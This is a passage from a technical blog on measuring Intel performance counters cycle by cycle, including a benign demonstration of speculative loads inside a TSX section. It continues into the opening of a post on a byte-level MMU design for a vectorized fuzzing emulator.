<span class="c">// counter (tracking the stat we're interested in) at the same time,</span>
<span class="c">// by using IA32_PERF_GLOBAL_CTRL. This is serializing so you don't</span>
<span class="c">// have to worry about re-ordering across this boundary.</span>
<span class="nf">enable_perf_globally</span><span class="p">();</span>
<span class="nd">asm!</span><span class="p">(</span><span class="s">r#"
asm
under
test
here
"#</span> <span class="p">::::</span> <span class="s">"volatile"</span><span class="p">);</span>
<span class="c">// Clear IA32_PERF_GLOBAL_CTRL to 0 to stop counters</span>
<span class="nf">disable_perf_globally</span><span class="p">();</span>
<span class="c">// If fixed PMC #1 has not overflowed, then we didn't capture</span>
<span class="c">// relevant data. This only can happen if we tried to sample a</span>
<span class="c">// cycle which happens after the assembly under test executed.</span>
<span class="k">if</span> <span class="o">!</span><span class="nf">fixed1_pmc_overflowed</span><span class="p">()</span> <span class="p">{</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
<span class="c">// At this point we can do whatever we want as the performance</span>
<span class="c">// counters have been turned off by the interrupt and we should have</span>
<span class="c">// relevant data in both :)</span>
<span class="c">// Get the count from fixed #1 PMC. It's important that we grab this</span>
<span class="c">// as interrupts are not deterministic, and thus it's possible we</span>
<span class="c">// "overshoot" the target</span>
<span class="k">let</span> <span class="n">fixed1_count</span> <span class="o">=</span> <span class="nf">read_fixed1_counter</span><span class="p">();</span>
<span class="c">// Add the distance-from-overflow we initially programmed into the</span>
<span class="c">// fixed #1 counter, with the current value of the fixed #1 counter</span>
<span class="c">// to get the total number of cycles which have elapsed during</span>
<span class="c">// our example.</span>
<span class="k">let</span> <span class="n">total_cycles</span> <span class="o">=</span> <span class="n">cycle_offset</span> <span class="o">+</span> <span class="n">fixed1_count</span><span class="p">;</span>
<span class="c">// Read the actual count from the performance counter we were using.</span>
<span class="c">// In this case we were using PMC #0 to track our event of interest.</span>
<span class="k">let</span> <span class="n">value</span> <span class="o">=</span> <span class="nf">read_pmc0</span><span class="p">();</span>
<span class="c">// Somehow log that performance counter `perf_counter` had a value</span>
<span class="c">// `value` `total_cycles` into execution</span>
<span class="nf">log_result</span><span class="p">(</span><span class="n">perf_counter</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">total_cycles</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<h4 id="simple-results">Simple results</h4>
<p>So? Does it work? Let’s try with a simple example of code that just does a few “nops” by adjusting the stack a few times:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">8</span>
<span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">8</span>
<span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">8</span>
<span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">8</span>
</code></pre></div></div>
<p><img src="/assets/simplesample.svg" alt="Simple Sample" /></p>
<p>So how do we read this graph? Well, the x-axis is simple. It’s the time, in cycles, of execution. The y-axis is the number of events (which varies based on the key). In this case we’re only graphing the number of instructions retired (successfully executed).</p>
<p>So does this look right? Hmmm… we ran 4 instructions, so why did we see 8 retire?</p>
<p>Well in this case there’s a little bit of “extra” noise introduced by the harnessing around the code under test. Let’s zoom out from our code and look at what actually executes during our test:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">; Right before test, we end up enabling all performance counters at once by</span>
<span class="c1">; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4</span>
<span class="c1">; programmable counters at the same time as enabling fixed PMC #1 (cycle count)</span>
<span class="err">00000000</span> <span class="nf">B98F030000</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x38f</span> <span class="c1">; IA32_PERF_GLOBAL_CTRL</span>
<span class="err">00000005</span> <span class="nf">B80F000000</span> <span class="nv">mov</span> <span class="nb">eax</span><span class="p">,</span><span class="mh">0xf</span>
<span class="err">0000000</span><span class="nf">A</span> <span class="nv">BA02000000</span> <span class="nv">mov</span> <span class="nb">edx</span><span class="p">,</span><span class="mh">0x2</span>
<span class="err">0000000</span><span class="nf">F</span> <span class="mi">0</span><span class="nv">F30</span> <span class="nv">wrmsr</span>
<span class="c1">; Here's our code under test :D</span>
<span class="err">00000011</span> <span class="err">4883</span><span class="nf">C408</span> <span class="nv">add</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="err">00000015</span> <span class="err">4883</span><span class="nf">EC08</span> <span class="nv">sub</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="err">00000019</span> <span class="err">4883</span><span class="nf">C408</span> <span class="nv">add</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="err">0000001</span><span class="nf">D</span> <span class="mi">4883</span><span class="nv">EC08</span> <span class="nv">sub</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="c1">; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0</span>
<span class="err">00000021</span> <span class="nf">B98F030000</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x38f</span>
<span class="err">00000026</span> <span class="err">31</span><span class="nf">C0</span> <span class="nv">xor</span> <span class="nb">eax</span><span class="p">,</span><span class="nb">eax</span>
<span class="err">00000028</span> <span class="err">31</span><span class="nf">D2</span> <span class="nv">xor</span> <span class="nb">edx</span><span class="p">,</span><span class="nb">edx</span>
<span class="err">0000002</span><span class="nf">A</span> <span class="mi">0</span><span class="nv">F30</span> <span class="nv">wrmsr</span>
</code></pre></div></div>
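<p>As a quick sanity check on the listing above, the <code class="language-plaintext highlighter-rouge">0x2_0000_000f</code> value delivered through <code class="language-plaintext highlighter-rouge">edx:eax</code> decodes exactly as the comment claims. Per the Intel SDM, bits 0-3 of <code class="language-plaintext highlighter-rouge">IA32_PERF_GLOBAL_CTRL</code> enable the programmable counters PMC0-PMC3, and bit 33 enables fixed counter #1:</p>

```rust
fn main() {
    // edx:eax pair written by the `wrmsr` in the listing above
    let (edx, eax): (u64, u64) = (0x2, 0xf);
    let value = (edx << 32) | eax;
    assert_eq!(value, 0x2_0000_000f);
    // Bits 0-3: enable programmable counters PMC0-PMC3
    assert_eq!(value & 0xf, 0b1111);
    // Bit 33: enable fixed counter #1, the un-halted cycle counter
    assert_eq!((value >> 33) & 1, 1);
    // No other enable bits are set
    assert_eq!(value & !(0xf | (1 << 33)), 0);
}
```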
<p>So if we take another look at the graph, we see there are 8 instructions that retired. The very first instruction we see retire (at cycle=11), is actually the <code class="language-plaintext highlighter-rouge">wrmsr</code> we used to enable the counters. This makes sense, at some point prior to retirement of the <code class="language-plaintext highlighter-rouge">wrmsr</code> instruction the counters must be enabled internally somewhere in the CPU. So we actually get to see this instruction retire!</p>
<p>Then we see 7 more instructions retire to give us a total of 8… hmm. Well, we have 4 of our <code class="language-plaintext highlighter-rouge">add</code> and <code class="language-plaintext highlighter-rouge">sub</code> mix that we executed, so that brings us down to 3 more remaining “unknown” instructions.</p>
<p>These 3 remaining instructions are explained by the code which disables the performance counter after our test code has executed. We have 1 <code class="language-plaintext highlighter-rouge">mov</code>, and 2 <code class="language-plaintext highlighter-rouge">xor</code> instructions which retire prior to the <code class="language-plaintext highlighter-rouge">wrmsr</code> which disables the counters. It makes sense that we never see the final <code class="language-plaintext highlighter-rouge">wrmsr</code> retire as the counters will be turned off in the CPU prior to the <code class="language-plaintext highlighter-rouge">wrmsr</code> instruction retiring!</p>
<p>Voila! It all makes sense. We now have a great view into what the CPU did in terms of retirement for the code in question. Everything we saw lined up with what actually executed, which is always good to see.</p>
<h4 id="a-bit-more-advanced-result">A bit more advanced result</h4>
<p>Let’s add a few more performance counters to track. In this case let’s track the number of instructions retired, as well as the number of micro-ops dispatched to port 4 (the store port). This will give us the number of stores which occurred during the test.</p>
<p>Code to test (just a few writes to the stack):</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">; Right before test, we end up enabling all performance counters at once by</span>
<span class="c1">; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4</span>
<span class="c1">; programmable counters at the same time as enabling fixed PMC #1 (cycle count)</span>
<span class="err">00000000</span> <span class="nf">B98F030000</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x38f</span>
<span class="err">00000005</span> <span class="nf">B80F000000</span> <span class="nv">mov</span> <span class="nb">eax</span><span class="p">,</span><span class="mh">0xf</span>
<span class="err">0000000</span><span class="nf">A</span> <span class="nv">BA02000000</span> <span class="nv">mov</span> <span class="nb">edx</span><span class="p">,</span><span class="mh">0x2</span>
<span class="err">0000000</span><span class="nf">F</span> <span class="mi">0</span><span class="nv">F30</span> <span class="nv">wrmsr</span>
<span class="err">00000011</span> <span class="err">4883</span><span class="nf">EC08</span> <span class="nv">sub</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="err">00000015</span> <span class="err">48</span><span class="nf">C7042400000000</span> <span class="nv">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">],</span><span class="mh">0x0</span>
<span class="err">0000001</span><span class="nf">D</span> <span class="mi">4883</span><span class="nv">C408</span> <span class="nv">add</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="err">00000021</span> <span class="err">4883</span><span class="nf">EC08</span> <span class="nv">sub</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="err">00000025</span> <span class="err">48</span><span class="nf">C7042400000000</span> <span class="nv">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">],</span><span class="mh">0x0</span>
<span class="err">0000002</span><span class="nf">D</span> <span class="mi">4883</span><span class="nv">C408</span> <span class="nv">add</span> <span class="nb">rsp</span><span class="p">,</span><span class="kt">byte</span> <span class="o">+</span><span class="mh">0x8</span>
<span class="c1">; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0</span>
<span class="err">00000031</span> <span class="nf">B98F030000</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x38f</span>
<span class="err">00000036</span> <span class="err">31</span><span class="nf">C0</span> <span class="nv">xor</span> <span class="nb">eax</span><span class="p">,</span><span class="nb">eax</span>
<span class="err">00000038</span> <span class="err">31</span><span class="nf">D2</span> <span class="nv">xor</span> <span class="nb">edx</span><span class="p">,</span><span class="nb">edx</span>
<span class="err">0000003</span><span class="nf">A</span> <span class="mi">0</span><span class="nv">F30</span> <span class="nv">wrmsr</span>
</code></pre></div></div>
<p><img src="/assets/storesample.svg" alt="Store Sample" /></p>
<p>This one is fun. We simply make room on the stack (<code class="language-plaintext highlighter-rouge">sub rsp</code>), write a 0 to the stack (<code class="language-plaintext highlighter-rouge">mov [rsp]</code>), and then restore the stack (<code class="language-plaintext highlighter-rouge">add rsp</code>), then do it all one more time.</p>
<p>Here we added another plot to the graph, <code class="language-plaintext highlighter-rouge">Port 4</code>, which is the store uOP port on the CPU. We also track the number of instructions retired, as we did in the first example. Here we can see instructions retired matches what we would expect. We see 10 retirements, 1 from the first <code class="language-plaintext highlighter-rouge">wrmsr</code> enabling the performance counters, 6 from our own code under test, and 3 more from the disabling of the performance counters.</p>
<p>This time we’re able to see where the stores occur, and indeed, 2 stores do occur. We see a store happen at cycle=28 and cycle=29. Interestingly we see the stores are back-to-back, even though there’s a bit of code between them. We’re probably observing some re-ordering! Later in the graph (cycle=39), we observe that 4 instructions get retired in a single cycle! How cool is that?!</p>
<h4 id="how-deep-can-we-go">How deep can we go?</h4>
<p>Using the exact same store example from above, we can enable even more performance counters. This gives us an even more detailed view of different parts of the micro-architectural state.</p>
<p><img src="/assets/busysample.svg" alt="Busy Sample" /></p>
<p>In this case we’re tracking all uOP port activity, machine clears (when the CPU resets itself after speculation), offcore requests (when messages get sent offcore, typically to access physical memory), instructions retired, and branches retired. In theory we can measure any possible performance counter available on our micro-architecture on a time domain. This gives us the ability to see almost anything that is happening on the CPU!</p>
<h4 id="noise">Noise…</h4>
<p>In all of the examples we’ve looked at, none of the data points have visible error bars. In these graphs the error bars represent the minimum value, mean value, and maximum value observed for a given data point. Since we’re running the same code over and over, and sampling it at different execution times, it’s very possible for “random” noise to interfere with results. Let’s look at a bit more noisy example:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">; Right before test, we end up enabling all performance counters at once by</span>
<span class="c1">; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4</span>
<span class="c1">; programmable counters at the same time as enabling fixed PMC #1 (cycle count)</span>
<span class="err">00000000</span> <span class="nf">B98F030000</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x38f</span>
<span class="err">00000005</span> <span class="nf">B80F000000</span> <span class="nv">mov</span> <span class="nb">eax</span><span class="p">,</span><span class="mh">0xf</span>
<span class="err">0000000</span><span class="nf">A</span> <span class="nv">BA02000000</span> <span class="nv">mov</span> <span class="nb">edx</span><span class="p">,</span><span class="mh">0x2</span>
<span class="err">0000000</span><span class="nf">F</span> <span class="mi">0</span><span class="nv">F30</span> <span class="nv">wrmsr</span>
<span class="err">00000011</span> <span class="err">48</span><span class="nf">C7042500000000</span> <span class="nv">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="mh">0x0</span><span class="p">],</span><span class="mh">0x0</span>
<span class="err">-00000000</span>
<span class="err">0000001</span><span class="nf">D</span> <span class="mi">48</span><span class="nv">C7042500000000</span> <span class="nv">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="mh">0x0</span><span class="p">],</span><span class="mh">0x0</span>
<span class="err">-00000000</span>
<span class="err">00000029</span> <span class="err">48</span><span class="nf">C7042500000000</span> <span class="nv">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="mh">0x0</span><span class="p">],</span><span class="mh">0x0</span>
<span class="err">-00000000</span>
<span class="err">00000035</span> <span class="err">48</span><span class="nf">C7042500000000</span> <span class="nv">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="mh">0x0</span><span class="p">],</span><span class="mh">0x0</span>
<span class="err">-00000000</span>
<span class="c1">; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0</span>
<span class="err">00000041</span> <span class="nf">B98F030000</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x38f</span>
<span class="err">00000046</span> <span class="err">31</span><span class="nf">C0</span> <span class="nv">xor</span> <span class="nb">eax</span><span class="p">,</span><span class="nb">eax</span>
<span class="err">00000048</span> <span class="err">31</span><span class="nf">D2</span> <span class="nv">xor</span> <span class="nb">edx</span><span class="p">,</span><span class="nb">edx</span>
<span class="err">0000004</span><span class="nf">A</span> <span class="mi">0</span><span class="nv">F30</span> <span class="nv">wrmsr</span>
</code></pre></div></div>
<p>Here we’re just going to write to <code class="language-plaintext highlighter-rouge">NULL</code> 4 times. This might sound bad, but in this example I mapped <code class="language-plaintext highlighter-rouge">NULL</code> in as normal write-back memory. Nothing crazy, just treat it as a valid address.</p>
<p>But here are the results:</p>
<p><img src="/assets/noisesample.svg" alt="Noise Sample" /></p>
<p>Hmmm… we have error bars! We see the stores always get dispatched at the same time. This makes sense, we’re always doing the same thing. But we see that some of the instructions have some variance in where they retire. For example, at cycle=38 we see that sometimes at this point 2 instructions have been retired, other times 4 have been retired, but on average a little over 3 instructions have been retired at this point. This tells us that the CPU isn’t always deterministic in this environment.</p>
<p>These results can get a bit more complex to interpret, but the data is still relevant. Changing the code under test, cleaning up the environment to be more deterministic, etc., can often improve the quality and visibility of the data.</p>
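<p>The bookkeeping behind those error bars is straightforward: for each (performance counter, cycle offset) data point we fold every sample into running minimum/maximum/mean statistics. A sketch of what that could look like (the <code class="language-plaintext highlighter-rouge">Stats</code> type is hypothetical, not from the actual harness):</p>

```rust
/// Running statistics for one (perf counter, cycle offset) data point.
/// This type is invented for illustration; it just shows how the error
/// bars (min, mean, max) could be produced from repeated samples.
struct Stats {
    min: u64,
    max: u64,
    sum: u64,
    count: u64,
}

impl Stats {
    fn new() -> Self {
        Stats { min: u64::MAX, max: 0, sum: 0, count: 0 }
    }

    /// Fold one sampled counter value into the running stats
    fn record(&mut self, value: u64) {
        self.min = self.min.min(value);
        self.max = self.max.max(value);
        self.sum += value;
        self.count += 1;
    }

    /// Mean of all samples recorded so far
    fn mean(&self) -> f64 {
        self.sum as f64 / self.count as f64
    }

    /// If min == max over many samples, the environment looks deterministic
    fn is_deterministic(&self) -> bool {
        self.min == self.max
    }
}

fn main() {
    let mut point = Stats::new();
    // e.g. instructions retired observed at one cycle offset across 4 runs
    for sample in [2u64, 4, 4, 3] {
        point.record(sample);
    }
    assert_eq!((point.min, point.max), (2, 4));
    assert_eq!(point.mean(), 3.25);
    // Non-zero spread: this data point gets visible error bars
    assert!(!point.is_deterministic());
}
```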
<h4 id="does-it-work-with-speculation">Does it work with speculation?</h4>
<p>Damn right it does! That was the whole point!</p>
<p>Let’s cause a fault, perform some loads behind it, and see if we can see the loads get issued even though the entire section of code is discarded.</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="err">//</span> <span class="nf">Start</span> <span class="nv">a</span> <span class="nv">TSX</span> <span class="nv">section</span><span class="p">,</span> <span class="nv">think</span> <span class="nv">of</span> <span class="nv">this</span> <span class="nv">as</span> <span class="nv">a</span> <span class="s">`try {`</span> <span class="nb">bl</span><span class="nv">ock</span>
<span class="nf">xbegin</span> <span class="mi">2</span><span class="nv">f</span>
<span class="err">//</span> <span class="nf">Read</span> <span class="nv">from</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="nv">causing</span> <span class="nv">a</span> <span class="nv">fault</span>
<span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="err">//</span> <span class="nf">Here</span><span class="err">'</span><span class="nv">s</span> <span class="nv">some</span> <span class="nv">loads</span> <span class="nv">shadowing</span> <span class="nv">the</span> <span class="nv">faulting</span> <span class="nv">load.</span> <span class="nv">These</span>
<span class="err">//</span> <span class="nf">should</span> <span class="nv">never</span> <span class="nv">occur</span><span class="p">,</span> <span class="nv">as</span> <span class="nv">the</span> <span class="nv">instruction</span> <span class="nv">above</span> <span class="nv">causes</span>
<span class="err">//</span> <span class="nf">an</span> <span class="nv">exception</span> <span class="nv">and</span> <span class="nv">thus</span> <span class="nv">execution</span> <span class="nv">should</span> <span class="s">"jump"</span> <span class="nv">to</span> <span class="nv">the</span> <span class="nv">label</span> <span class="s">`2:`</span>
<span class="nf">.rept</span> <span class="mi">32</span>
<span class="err">//</span> <span class="nf">Repeated</span> <span class="nv">load</span> <span class="mi">32</span> <span class="nv">times</span>
<span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
<span class="nf">.endr</span>
<span class="err">//</span> <span class="nf">End</span> <span class="nv">the</span> <span class="nv">TSX</span> <span class="nv">section</span><span class="p">,</span> <span class="nv">think</span> <span class="nv">of</span> <span class="nv">this</span> <span class="nv">as</span> <span class="nv">a</span> <span class="s">`}`</span> <span class="nb">cl</span><span class="nv">osing</span> <span class="nv">the</span>
<span class="err">//</span> <span class="err">`</span><span class="nf">try</span><span class="err">`</span> <span class="nb">bl</span><span class="nv">ock</span>
<span class="nf">xend</span>
<span class="err">2:</span>
<span class="err">//</span> <span class="nf">Here</span> <span class="nv">is</span> <span class="nv">where</span> <span class="nv">execution</span> <span class="nv">goes</span> <span class="nv">if</span> <span class="nv">the</span> <span class="nv">TSX</span> <span class="nv">section</span> <span class="nv">had</span>
<span class="err">//</span> <span class="nf">an</span> <span class="nv">exception</span><span class="p">,</span> <span class="nv">and</span> <span class="nv">thus</span> <span class="nv">where</span> <span class="nv">execution</span> <span class="nv">will</span> <span class="nv">flow</span>
</code></pre></div></div>
<p><img src="/assets/speculationsample.svg" alt="Speculation Sample" /></p>
<p>Both ports 2 and port 3 are load ports. We see both of them taking turns handling loads (1 load per cycle each, with 2 ports, 2 loads per cycle total). Here we can see <em>many</em> different loads get dispatched, even though very few instructions actually retire. What we’re viewing here is the micro-architecture performing speculation! Neat!</p>
<h4 id="more-data">More data?</h4>
<p>I could go on and on graphing different CPU behaviors! There’s so much cool stuff to explore out there. However, this blog has already gotten longer than I wanted, so I’ll stop here. Maybe I’ll make future small blogs about certain interesting behaviors!</p>
<hr />
<h1 id="conclusion-1">Conclusion</h1>
<p>This technique of measuring performance counters on a time-domain seems to work quite well. You have to be very careful with noise, but with careful interpretation of the data, this technique provides the highest level of visibility into the Intel micro-architecture that I’ve ever seen!</p>
<p>This tool is incredibly useful for validating hypotheses about the behaviors of various Intel micro-architectures. By running multiple experiments on different behaviors, a more macro-level model can be derived about the inner workings of the CPU. This could lead to learning new optimization techniques, finding new CPU vulnerabilities, and just in general having fun learning how things work!</p>
<hr />
<h1 id="source">Source?</h1>
<p>Update: 8/19/2019</p>
<p>This kernel has too many sensitive features that I do not want to make public at this time…</p>
<p>However, it seems there’s a lot of interest in this tech, so I will try to live stream soon adding this functionality to my already-open-source kernel <a href="https://github.com/gamozolabs/orange_slice">Orange Slice</a>!</p>
<hr />
<h1 id="vectorized-emulation-mmu-design">Vectorized Emulation: MMU Design</h1>
<p><em>Published 2018-11-19 at <a href="https://gamozolabs.github.io/fuzzing/2018/11/19/vectorized_emulation_mmu">https://gamozolabs.github.io/fuzzing/2018/11/19/vectorized_emulation_mmu</a></em></p>
<p><img src="/assets/softserve.png" alt="Softserve" /></p>
<p><em>New vectorized emulator codenamed softserve</em></p>
<h1 id="tweeter">Tweeter</h1>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when new blogs come up.</p>
<h1 id="check-out-the-intro">Check out the intro</h1>
<p>This is the continuation of a multipart series. See the introduction post <a href="https://gamozolabs.github.io/fuzzing/2018/10/14/vectorized_emulation.html">here</a></p>
<p>This post assumes you’ve read the intro and doesn’t explain some of the basics of the vectorized emulation concept. Go read it if you haven’t!</p>
<p>Further this blog is a lot more technical than the introduction. This is meant to go deep enough to clear up most/all potential questions about the MMU. It expects that you have a general knowledge of page tables and virtual addressing models. Hopefully we do a decent job explaining these things such that it’s not a hard requirement!</p>
<h1 id="the-code">The code</h1>
<p>This blog explains the intent behind a pretty complex MMU design. The code that this blog references can be found <a href="https://github.com/gamozolabs/vectorized_mmu">here</a>. I have no plans to open source the vectorized emulator, and this MMU is just a snapshot of what this blog is explaining. I have no intent to update this code as I change my MMU model. Further, this code is not buildable as I’m not open sourcing my assembler; however, I assume the syntax is pretty obvious and can be read as pseudocode.</p>
<p>By sharing this code I can talk at a higher level and allow the nitty-gritty details to be explained by the actual implementation.</p>
<p>It’s also important to note that this code is not being used in production yet. It’s got room for micro-optimizations and polish. At least it should be doing the <em>correct</em> operations and hopefully the tests are verifying this. Right now I’m trying to keep it simple to make sure it’s correct and then polish it later using this version as reference.</p>
<h1 id="intro">Intro</h1>
<p>Today we’re going to talk about the internals of the memory management unit (MMU) design I have used in my vectorized emulator. The MMU is responsible for creating the fake memory environment of the VMs that run under the emulator. Further, the MMU design used here is also meant to catch bugs as early as possible. To do this we implement what I call a “byte-level MMU”, where each byte has its own permission bits. Since vectorized emulation is meant for fuzzing, it’s also important that the memory state can be restored to the original state quickly so a new fuzz iteration can be started.</p>
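<p>To make the “byte-level MMU” idea concrete before diving into the real design, here is a deliberately tiny sketch of per-byte permission checking. The type and constants are invented for illustration and are far simpler than the actual MMU discussed in this post:</p>

```rust
/// Hypothetical per-byte write permission bit
const PERM_WRITE: u8 = 1 << 1;

/// A toy guest memory region where every byte carries its own permissions
struct ByteMmu {
    bytes: Vec<u8>,
    perms: Vec<u8>, // one permission byte per data byte
}

impl ByteMmu {
    fn new(size: usize) -> Self {
        ByteMmu { bytes: vec![0; size], perms: vec![0; size] }
    }

    /// Writing requires PERM_WRITE on every single byte touched; on a
    /// violation we report the exact offending byte address
    fn write(&mut self, addr: usize, data: &[u8]) -> Result<(), usize> {
        for (i, &byte) in data.iter().enumerate() {
            let at = addr + i;
            if self.perms.get(at).map_or(true, |&p| p & PERM_WRITE == 0) {
                return Err(at);
            }
            self.bytes[at] = byte;
        }
        Ok(())
    }
}

fn main() {
    let mut mmu = ByteMmu::new(8);
    // Mark only bytes [2..6) writable
    for p in &mut mmu.perms[2..6] {
        *p |= PERM_WRITE;
    }
    // A fully in-bounds write succeeds
    assert_eq!(mmu.write(2, &[1, 2, 3, 4]), Ok(()));
    assert_eq!(mmu.bytes[2..6], [1, 2, 3, 4]);
    // A 3-byte write starting at 5 faults precisely at byte 6
    assert_eq!(mmu.write(5, &[9, 9, 9]), Err(6));
}
```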
<p>During this blog we introduce a few big concepts:</p>
<ul>
<li>Differential restores</li>
<li>Byte-level permissions</li>
<li>Read-after-write memory (uninitialized memory tracking)</li>
<li>Gage fuzzing</li>
<li>Aliased/CoW memory</li>
<li>Deduplicated memory</li>
<li>Technical details about the IL relevant to the MMU</li>
<li>Painful details about everything</li>
</ul>
<p>Since this emulator design is meant to run multiple architectures and programs in different environments, it’s critical the MMU design supports a superset of the features of all the programs I may run. For example, system processes typically are run in the high memory ranges <code class="language-plaintext highlighter-rouge">0xffff...</code> and above. Part of the design here is to make sure that a full guest address space can be used, including high memory addresses. Things like x86_64 have 48-bit address spaces, whereas things like ARM64 have 49-bit address spaces (2 separate 48-bit address spaces). Thus to run an ARM64 target on x86 I need to provide more bits than are actually present. Luckily most systems use this address space sparsely, so by using different data structures we can support emulating these targets with ease.</p>
<h1 id="the-problem">The problem</h1>
<p>Before we get into describing the solution, let’s address what the problem is in the first place!</p>
<p>When creating an emulator it’s important to create isolation between the emulated guest and the actual system. For example if the guest accesses memory, it’s important that it can only access its own memory, and that it isn’t overwriting the emulator’s own memory. To do this there are multiple traditional solutions:</p>
<ul>
<li>Restrict the address space of the guest such that it can fit entirely in the emulator’s address space</li>
<li>Use a data structure to emulate a sparse guest’s memory space</li>
<li>Create a new process/VM with only the guest’s memory mapped in</li>
</ul>
<p>The first solution is the simplest, fastest, but also the least portable. It typically consists of allocating a buffer the size of the guest’s address space, and then any guest memory accesses are added to the base of this buffer and ensured to not go out of bounds. A model like this can rely on the hardware’s permission checking by setting permissions via <code class="language-plaintext highlighter-rouge">mmap</code> or <code class="language-plaintext highlighter-rouge">VirtualProtect</code>. This is an extremely fast model and allows for running applications that fit inside of the emulator’s address space. When running a 64-bit VM this can become tough as most OSes do not provide a means of allocating memory in the high part of the address space <code class="language-plaintext highlighter-rouge">0xffff...</code> and beyond. This memory is typically reserved for the kernel. This is the model used by things like <code class="language-plaintext highlighter-rouge">qemu-user</code> as it is super fast and works great for well-behaving userland applications. By setting the <code class="language-plaintext highlighter-rouge">QEMU_GUEST_BASE</code> environment variable you can change this base and set the size with <code class="language-plaintext highlighter-rouge">QEMU_RESERVED_VA</code>.</p>
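<p>As a rough sketch (the type and method names here are made up for illustration, not taken from <code class="language-plaintext highlighter-rouge">qemu-user</code> or my emulator), the flat-buffer model boils down to a bounds check and an add:</p>

```rust
/// Minimal sketch of the flat-buffer guest memory model: one linear
/// allocation spanning the whole guest address space, accessed by
/// adding the guest address to the base of the buffer.
struct FlatGuest {
    /// Backing buffer covering the entire guest address space
    backing: Vec<u8>,
}

impl FlatGuest {
    /// The single bounds check is all the software enforcement done;
    /// permission checks are left to the host's hardware page tables
    fn read_u8(&self, guest_addr: usize) -> Option<u8> {
        self.backing.get(guest_addr).copied()
    }

    fn write_u8(&mut self, guest_addr: usize, val: u8) -> Option<()> {
        *self.backing.get_mut(guest_addr)? = val;
        Some(())
    }
}
```

<p>This is why the model is so fast: a guest access is one compare and one add, with the hardware doing the rest.</p>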
<p>The second solution is fairly slow, but allows for more strict memory permissions than the host system allows. Typically the data structure used to access the guest’s memory is similar to traditional page table models used in hardware. However since it’s implemented in software it’s possible to change these page tables to contain any metadata or sizes as desired. This is the model I ultimately use, but with a few twists from traditional page tables.</p>
<p>The third solution leverages something like VT-x or a thin process to almost directly use the target hardware’s page table models for a VM. This will make the emulator tied to an architecture, might require a driver, and like the first solution, doesn’t allow for stricter memory models. This is actually one of the first models I used in my emulator and I’ll go into it a bit more in the history section.</p>
<hr />
<h1 id="history">History</h1>
<p><em>Feel free to skip this section if you don’t care about context</em></p>
<p>To give some background on how we ended up where we ended up it’s important to go through the background of the MMU designs used in the past. <em>Note that the generations aren’t the same MMU improving, it’s just different MMUs I’ve designed over time.</em></p>
<h4 id="first-generation">First generation</h4>
<p>The first generation of my MMU was a simple modification to QEMU to allow for quick tracking of which memory was modified. In this case my target was a system level target so I was not using <code class="language-plaintext highlighter-rouge">qemu-user</code>, but rather <code class="language-plaintext highlighter-rouge">qemu-system</code>. I ripped out the core physical memory manager in QEMU and replaced it with my own that effectively mimicked the x86 page table model. I was most comfortable with the x86 page table model and since it was implemented in hardware I assumed it was probably well engineered. The only interest I had in this first MMU was to quickly gather which memory was modified so I could restore only the dirtied memory to save time during reset time. This had a huge improvement <a href="https://github.com/gamozolabs/falkervisor_grilled_cheese">for my hypervisor</a> so it was natural for me to just copy it over to QEMU so I could get the same benefits.</p>
